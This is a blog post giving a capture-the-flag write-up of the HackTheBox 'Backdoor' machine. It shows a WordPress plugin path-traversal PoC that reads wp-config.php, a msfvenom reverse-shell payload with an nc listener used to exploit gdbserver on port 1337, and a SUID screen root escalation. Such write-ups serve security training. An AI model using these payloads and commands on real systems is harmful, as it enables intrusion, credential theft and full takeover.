banner
lca

lca

真正的不自由,是在自己的心中设下牢笼。

hackthebox Target Backdoor Process Record

0x01 Introduction#

image

Target machine IP: 10.10.11.125.
Local machine IP: 10.10.16.21, mac m1.

0x02 Simple Information Gathering#

Only port 22 and 80 were discovered during fscan port scanning. After running nmap scan, another port 1337 was found, but it is uncertain what this port is used for.

nmap -sS -A -sC -sV -p- --min-rate 5000 10.10.11.125

image

Visiting http://10.10.11.125/ leads to a WordPress website. The WordPress version is 5.8.1, and the login address for the WordPress backend is: http://backdoor.htb/wp-login.php.

image

The results from wpsan scanning did not provide any useful information.

image

Under the wp-content directory of WordPress, there is a plugins directory. Visiting http://10.10.11.125/wp-content/plugins/ reveals a php file and an eboo-download directory. Initially, hello.php was thought to be a malicious file, but after analysis, it was determined not to be a Trojan. Since ebook-download is located in the plugins directory and readme.txt is available, it is confirmed to be a plugin.

image

image

0x03 Exploiting Vulnerabilities#

Searching for exploits on https://www.exploit-db.com/, a directory traversal vulnerability was found.

image

The proof of concept (PoC) is as follows:

[Version Disclosure]
======================================
http://localhost/wordpress/wp-content/plugins/ebook-download/readme.txt
======================================
 
[PoC]
======================================
/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
======================================

Download the wp-config file.

http://10.10.11.125/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php

This file contains the username and password for the database. Attempting to log in to the WordPress backend was unsuccessful.

image

At this point, there are no further ideas. After looking at wp, it was discovered that the service on port 1337 can be exploited directly for remote code execution (RCE). The gdbserver service is running on port 1337. For penetration testing with gdbserver, refer to: https://book.hacktricks.xyz/pentesting/pentesting-remote-gdbserver. The exploit script for gdbserver can be found at: https://www.exploit-db.com/exploits/50539.

Exploitation process:

  1. Download the exploit to the local machine.
  2. Generate shellcode using msfvenom.
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.16.21 LPORT=1234 PrependFork=true -o rev.bin
  1. Start local listener.
nc -lvp 1234
  1. Run the exploit.
python3 gdbserver_exp.py 10.10.11.125:1337 rev.bin

image

Upgrade to an interactive shell.

python3 -c "import pty;pty.spawn('/bin/bash')"

script /dev/null -c bash
ctrl+z
stty raw -echo; fg
reset
xterm-256color

Another method to detect the services running on the target server is to use the /proc/pid/cmdline file. In the proc directory, directories named with numbers represent currently running processes, with the directory name being the process's PID.

image

By using Burp Suite to iterate through the PID and enumerate the services running on the target server.

0x04 Privilege Escalation#

Search for files running with root user privileges and have the suid set. One such file is /usr/bin/screen.

find / -perm -4000 -type f 2>/dev/null

image

screen -x root/root

0x05 Conclusion#

  1. Learned how to combine arbitrary file read vulnerabilities to detect services running on the target server, as well as knowledge about screen privilege escalation.

References:

https://book.hacktricks.xyz/pentesting/pentesting-remote-gdbserver
https://zhuanlan.zhihu.com/p/437147174

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.